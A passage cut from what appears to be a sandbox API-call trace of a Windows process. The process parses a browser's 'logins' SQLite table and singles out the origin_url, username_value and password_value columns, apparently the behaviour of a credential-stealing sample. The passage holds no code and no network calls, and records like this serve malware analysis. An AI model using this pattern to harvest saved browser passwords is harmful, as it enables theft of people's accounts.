(This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.179] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.179] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.179] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.179] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.179] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.179] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0x57c6e0 [0590.179] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.180] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.180] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x58d840 [0590.180] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.180] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0x57c6e0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x12, cb=0x0, dwLockType=0x0) returned 0x0 [0590.180] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.180] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x58d8d8 [0590.180] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0590.180] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.180] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.180] LocalAlloc (uFlags=0x40, uBytes=0x317) returned 0x63fa38 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.180] IStream:LockRegion (This=0x639fe0, libOffset=0x19, cb=0x0, dwLockType=0x0) returned 0x0 [0590.180] IStream:SetSize (This=0x639fe0, libNewSize=0x63fa38) returned 0x0 [0590.180] LocalAlloc (uFlags=0x40, uBytes=0x31f) returned 0x5e6798 [0590.180] LocalFree (hMem=0x63fa38) returned 0x0 [0590.180] LocalFree (hMem=0x56ff38) returned 0x0 [0590.180] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.180] lstrcmpiA (lpString1="logins", lpString2="logins") returned 0 [0590.180] lstrcmpA (lpString1="table", lpString2="table") returned 0 [0590.180] StrStrIA (lpFirst="CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, preferred INTEGER NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, date_synced INTEGER, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))", lpSrch="(") returned="(origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, preferred INTEGER NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, date_synced INTEGER, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))" [0590.180] StrStrIA (lpFirst="origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, preferred INTEGER NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_data BLOB, date_synced INTEGER, display_name VARCHAR, icon_url VARCHAR, federation_url VARCHAR, skip_zero_click INTEGER, generation_upload_status INTEGER, possible_username_pairs BLOB, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))", lpSrch=")") returned="))" [0590.180] lstrlenA (lpString="origin_url VARCHAR NOT NULL") returned 27 [0590.180] StrStrIA (lpFirst="origin_url VARCHAR NOT NULL", lpSrch=" ") returned=" VARCHAR NOT NULL" [0590.180] lstrlenA (lpString="origin_url") returned 10 [0590.180] lstrcmpiA (lpString1="origin_url", lpString2="CONSTRAINT") returned 1 [0590.180] lstrcmpiA (lpString1="origin_url", lpString2="CONSTRAINT") returned 1 [0590.180] lstrcmpiA (lpString1="origin_url", lpString2="CONSTRAINT") returned 1 [0590.180] lstrcmpiA (lpString1="origin_url", lpString2="CONSTRAINT") returned 1 [0590.180] lstrcmpiA (lpString1="origin_url", lpString2="CONSTRAINT") returned 1 [0590.180] lstrcmpiA (lpString1="origin_url", lpString2="origin_url") returned 0 [0590.180] lstrlenA (lpString=" action_url VARCHAR") returned 19 [0590.180] StrStrIA (lpFirst="action_url VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.180] lstrlenA (lpString="action_url") returned 10 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="CONSTRAINT") returned -1 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="CONSTRAINT") returned -1 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="CONSTRAINT") returned -1 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="CONSTRAINT") returned -1 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="CONSTRAINT") returned -1 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="origin_url") returned -1 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="password_value") returned -1 [0590.180] lstrcmpiA (lpString1="action_url", lpString2="username_value") returned -1 [0590.180] lstrlenA (lpString=" username_element VARCHAR") returned 25 [0590.181] StrStrIA (lpFirst="username_element VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.181] lstrlenA (lpString="username_element") returned 16 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="origin_url") returned 1 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="password_value") returned 1 [0590.181] lstrcmpiA (lpString1="username_element", lpString2="username_value") returned -1 [0590.181] lstrlenA (lpString=" username_value VARCHAR") returned 23 [0590.181] StrStrIA (lpFirst="username_value VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.181] lstrlenA (lpString="username_value") returned 14 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="origin_url") returned 1 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="password_value") returned 1 [0590.181] lstrcmpiA (lpString1="username_value", lpString2="username_value") returned 0 [0590.181] lstrlenA (lpString=" password_element VARCHAR") returned 25 [0590.181] StrStrIA (lpFirst="password_element VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.181] lstrlenA (lpString="password_element") returned 16 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="origin_url") returned 1 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="password_value") returned -1 [0590.181] lstrcmpiA (lpString1="password_element", lpString2="username_value") returned -1 [0590.181] lstrlenA (lpString=" password_value BLOB") returned 20 [0590.181] StrStrIA (lpFirst="password_value BLOB", lpSrch=" ") returned=" BLOB" [0590.181] lstrlenA (lpString="password_value") returned 14 [0590.181] lstrcmpiA (lpString1="password_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_value", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="password_value", lpString2="origin_url") returned 1 [0590.181] lstrcmpiA (lpString1="password_value", lpString2="password_value") returned 0 [0590.181] lstrlenA (lpString=" submit_element VARCHAR") returned 23 [0590.181] StrStrIA (lpFirst="submit_element VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.181] lstrlenA (lpString="submit_element") returned 14 [0590.181] lstrcmpiA (lpString1="submit_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="submit_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="submit_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="submit_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="submit_element", lpString2="CONSTRAINT") returned 1 [0590.181] lstrcmpiA (lpString1="submit_element", lpString2="origin_url") returned 1 [0590.182] lstrcmpiA (lpString1="submit_element", lpString2="password_value") returned 1 [0590.182] lstrcmpiA (lpString1="submit_element", lpString2="username_value") returned -1 [0590.182] lstrlenA (lpString=" signon_realm VARCHAR NOT NULL") returned 30 [0590.182] StrStrIA (lpFirst="signon_realm VARCHAR NOT NULL", lpSrch=" ") returned=" VARCHAR NOT NULL" [0590.182] lstrlenA (lpString="signon_realm") returned 12 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="origin_url") returned 1 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="password_value") returned 1 [0590.182] lstrcmpiA (lpString1="signon_realm", lpString2="username_value") returned -1 [0590.182] lstrlenA (lpString=" preferred INTEGER NOT NULL") returned 27 [0590.182] StrStrIA (lpFirst="preferred INTEGER NOT NULL", lpSrch=" ") returned=" INTEGER NOT NULL" [0590.182] lstrlenA (lpString="preferred") returned 9 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="origin_url") returned 1 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="password_value") returned 1 [0590.182] lstrcmpiA (lpString1="preferred", lpString2="username_value") returned -1 [0590.182] lstrlenA (lpString=" date_created INTEGER NOT NULL") returned 30 [0590.182] StrStrIA (lpFirst="date_created INTEGER NOT NULL", lpSrch=" ") returned=" INTEGER NOT NULL" [0590.182] lstrlenA (lpString="date_created") returned 12 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="origin_url") returned -1 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="password_value") returned -1 [0590.182] lstrcmpiA (lpString1="date_created", lpString2="username_value") returned -1 [0590.182] lstrlenA (lpString=" blacklisted_by_user INTEGER NOT NULL") returned 37 [0590.182] StrStrIA (lpFirst="blacklisted_by_user INTEGER NOT NULL", lpSrch=" ") returned=" INTEGER NOT NULL" [0590.182] lstrlenA (lpString="blacklisted_by_user") returned 19 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="CONSTRAINT") returned -1 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="CONSTRAINT") returned -1 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="CONSTRAINT") returned -1 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="CONSTRAINT") returned -1 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="CONSTRAINT") returned -1 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="origin_url") returned -1 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="password_value") returned -1 [0590.182] lstrcmpiA (lpString1="blacklisted_by_user", lpString2="username_value") returned -1 [0590.182] lstrlenA (lpString=" scheme INTEGER NOT NULL") returned 24 [0590.182] StrStrIA (lpFirst="scheme INTEGER NOT NULL", lpSrch=" ") returned=" INTEGER NOT NULL" [0590.182] lstrlenA (lpString="scheme") returned 6 [0590.182] lstrcmpiA (lpString1="scheme", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="scheme", lpString2="CONSTRAINT") returned 1 [0590.182] lstrcmpiA (lpString1="scheme", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="scheme", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="scheme", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="scheme", lpString2="origin_url") returned 1 [0590.183] lstrcmpiA (lpString1="scheme", lpString2="password_value") returned 1 [0590.183] lstrcmpiA (lpString1="scheme", lpString2="username_value") returned -1 [0590.183] lstrlenA (lpString=" password_type INTEGER") returned 22 [0590.183] StrStrIA (lpFirst="password_type INTEGER", lpSrch=" ") returned=" INTEGER" [0590.183] lstrlenA (lpString="password_type") returned 13 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="origin_url") returned 1 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="password_value") returned -1 [0590.183] lstrcmpiA (lpString1="password_type", lpString2="username_value") returned -1 [0590.183] lstrlenA (lpString=" times_used INTEGER") returned 19 [0590.183] StrStrIA (lpFirst="times_used INTEGER", lpSrch=" ") returned=" INTEGER" [0590.183] lstrlenA (lpString="times_used") returned 10 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="origin_url") returned 1 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="password_value") returned 1 [0590.183] lstrcmpiA (lpString1="times_used", lpString2="username_value") returned -1 [0590.183] lstrlenA (lpString=" form_data BLOB") returned 15 [0590.183] StrStrIA (lpFirst="form_data BLOB", lpSrch=" ") returned=" BLOB" [0590.183] lstrlenA (lpString="form_data") returned 9 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="origin_url") returned -1 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="password_value") returned -1 [0590.183] lstrcmpiA (lpString1="form_data", lpString2="username_value") returned -1 [0590.183] lstrlenA (lpString=" date_synced INTEGER") returned 20 [0590.183] StrStrIA (lpFirst="date_synced INTEGER", lpSrch=" ") returned=" INTEGER" [0590.183] lstrlenA (lpString="date_synced") returned 11 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="CONSTRAINT") returned 1 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="origin_url") returned -1 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="password_value") returned -1 [0590.183] lstrcmpiA (lpString1="date_synced", lpString2="username_value") returned -1 [0590.183] lstrlenA (lpString=" display_name VARCHAR") returned 21 [0590.183] StrStrIA (lpFirst="display_name VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.184] lstrlenA (lpString="display_name") returned 12 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="origin_url") returned -1 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="password_value") returned -1 [0590.184] lstrcmpiA (lpString1="display_name", lpString2="username_value") returned -1 [0590.184] lstrlenA (lpString=" icon_url VARCHAR") returned 17 [0590.184] StrStrIA (lpFirst="icon_url VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.184] lstrlenA (lpString="icon_url") returned 8 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="origin_url") returned -1 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="password_value") returned -1 [0590.184] lstrcmpiA (lpString1="icon_url", lpString2="username_value") returned -1 [0590.184] lstrlenA (lpString=" federation_url VARCHAR") returned 23 [0590.184] StrStrIA (lpFirst="federation_url VARCHAR", lpSrch=" ") returned=" VARCHAR" [0590.184] lstrlenA (lpString="federation_url") returned 14 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="origin_url") returned -1 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="password_value") returned -1 [0590.184] lstrcmpiA (lpString1="federation_url", lpString2="username_value") returned -1 [0590.184] lstrlenA (lpString=" skip_zero_click INTEGER") returned 24 [0590.184] StrStrIA (lpFirst="skip_zero_click INTEGER", lpSrch=" ") returned=" INTEGER" [0590.184] lstrlenA (lpString="skip_zero_click") returned 15 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="origin_url") returned 1 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="password_value") returned 1 [0590.184] lstrcmpiA (lpString1="skip_zero_click", lpString2="username_value") returned -1 [0590.184] lstrlenA (lpString=" generation_upload_status INTEGER") returned 33 [0590.184] StrStrIA (lpFirst="generation_upload_status INTEGER", lpSrch=" ") returned=" INTEGER" [0590.184] lstrlenA (lpString="generation_upload_status") returned 24 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="CONSTRAINT") returned 1 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="origin_url") returned -1 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="password_value") returned -1 [0590.184] lstrcmpiA (lpString1="generation_upload_status", lpString2="username_value") returned -1 [0590.185] lstrlenA (lpString=" possible_username_pairs BLOB") returned 29 [0590.185] StrStrIA (lpFirst="possible_username_pairs BLOB", lpSrch=" ") returned=" BLOB" [0590.185] lstrlenA (lpString="possible_username_pairs") returned 23 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="origin_url") returned 1 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="password_value") returned 1 [0590.185] lstrcmpiA (lpString1="possible_username_pairs", lpString2="username_value") returned -1 [0590.185] lstrlenA (lpString=" UNIQUE (origin_url") returned 19 [0590.185] StrStrIA (lpFirst="UNIQUE (origin_url", lpSrch=" ") returned=" (origin_url" [0590.185] lstrlenA (lpString="UNIQUE") returned 6 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="CONSTRAINT") returned 1 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="origin_url") returned 1 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="password_value") returned 1 [0590.185] lstrcmpiA (lpString1="UNIQUE", lpString2="username_value") returned -1 [0590.185] lstrlenA (lpString=" username_element") returned 17 [0590.185] StrStrIA (lpFirst="username_element", lpSrch=" ") returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x1800, cb=0x0, dwLockType=0x0) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x1800, cb=0x0, dwLockType=0x0) returned 0x0 [0590.185] IStream:SetSize (This=0x57ea78, libNewSize=0x52da4b) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x1801, cb=0x0, dwLockType=0x0) returned 0x0 [0590.185] IStream:SetSize (This=0x57ea78, libNewSize=0x52da4a) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x1803, cb=0x0, dwLockType=0x0) returned 0x0 [0590.185] IStream:SetSize (This=0x57ea78, libNewSize=0x52da4a) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x1805, cb=0x0, dwLockType=0x0) returned 0x0 [0590.185] IStream:SetSize (This=0x57ea78, libNewSize=0x52da4a) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.185] IStream:LockRegion (This=0x57ea78, libOffset=0x1807, cb=0x0, dwLockType=0x0) returned 0x0 [0590.185] IStream:SetSize (This=0x57ea78, libNewSize=0x52da4b) returned 0x0 [0590.185] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2eee0e0 [0590.185] LocalFree (hMem=0x2eee0e0) returned 0x0 [0590.185] LocalFree (hMem=0x58d548) returned 0x0 [0590.186] LocalFree (hMem=0x58d840) returned 0x0 [0590.186] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.186] LocalFree (hMem=0x58d970) returned 0x0 [0590.186] LocalFree (hMem=0x5e6798) returned 0x0 [0590.186] LocalFree (hMem=0x570078) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x73a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, 